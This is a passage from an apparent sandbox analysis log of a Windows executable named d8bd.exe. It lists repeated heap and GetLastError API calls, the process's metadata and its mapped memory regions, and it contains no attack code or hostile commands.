\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0208.880] HeapValidate (hHeap=0x930000, dwFlags=0x0, lpMem=0x933158) returned 1 [0208.881] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0x933158 | out: hHeap=0x930000) returned 1 [0208.881] HeapValidate (hHeap=0x930000, dwFlags=0x0, lpMem=0x932f20) returned 1 [0208.881] HeapFree (in: hHeap=0x930000, dwFlags=0x0, lpMem=0x932f20 | out: hHeap=0x930000) returned 1 [0208.881] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x426da0) returned 0x0 [0208.882] HeapValidate (hHeap=0x930000, dwFlags=0x0, lpMem=0x932c20) returned 1 [0208.883] GetLastError () returned 0x0 [0208.883] GetLastError () returned 0x0 [0208.883] GetLastError () returned 0x0 [0208.883] GetLastError () returned 0x0 [0208.883] GetLastError () returned 0x0 [0208.883] GetLastError () returned 0x0 [0208.883] GetLastError () returned 0x0 [0208.883] GetLastError () returned 0x0 [0208.883] GetLastError () returned 0x0 [0208.883] GetLastError () returned 0x0 [0208.883] GetLastError () returned 0x0 [0208.883] GetLastError () returned 0x0 [0208.883] GetLastError () returned 0x0 [0208.883] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.884] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.885] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.886] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.887] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.888] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.889] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.890] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.891] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0208.892] GetLastError () returned 0x0 [0213.606] GetLastError () returned 0x0 [0213.606] GetLastError () returned 0x0 [0213.606] GetLastError () returned 0x0 [0213.606] GetLastError () returned 0x0 [0213.606] GetLastError () returned 0x0 [0213.606] GetLastError () returned 0x0 [0213.606] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.607] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.608] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.609] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.610] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.611] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.612] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.613] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.614] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.615] GetLastError () returned 0x0 [0213.616] GetLastError () returned 0x0 [0213.616] GetLastError () returned 0x0 [0213.616] GetLastError () returned 0x0 Process: id = "7" image_name = "d8bd.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\d8bd.exe" page_root = "0x6af1b000" os_pid = "0x31c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x618" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\D8BD.exe" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6694 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6695 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6696 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 6697 start_va = 0x60000 end_va = 0x61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6698 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6699 start_va = 0x400000 end_va = 0x8fffff monitored = 1 entry_point = 0x8fea00 region_type = mapped_file name = "d8bd.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\D8BD.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\d8bd.exe") Region: id = 6700 start_va = 0x900000 end_va = 0xafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 6701 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6702 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 6703 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6720 start_va = 0xc50000 end_va = 0xd4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 6721 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6722 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6723 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6724 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 6725 start_va = 0x70000 end_va = 0x12dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6726 start_va = 0x7ffd4a880000 end_va = 0x7ffd4a8f8fff monitored = 0 entry_point = 0x7ffd4a89fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 6731 start_va = 0x7ff5ffe50000 end_va = 0x7ff5ffecdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 6986 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6994 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6995 start_va = 0xd50000 end_va = 0xf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 6996 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6997 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7004 start_va = 0x130000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 7005 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7006 start_va = 0x7ffd4c590000 end_va = 0x7ffd4c59afff monitored = 0 entry_point = 0x7ffd4c5919a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 7017 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 7018 start_va = 0x130000 end_va = 0x136fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 7019 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 7020 start_va = 0x7ffd4b250000 end_va = 0x7ffd4b272fff monitored = 0 entry_point = 0x7ffd4b253670 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 7021 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7022 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7028 start_va = 0x7ffd4aa40000 end_va = 0x7ffd4aa6bfff monitored = 0 entry_point = 0x7ffd4aa48210 region_type = mapped_file name = "winmmbase.dll" filename = 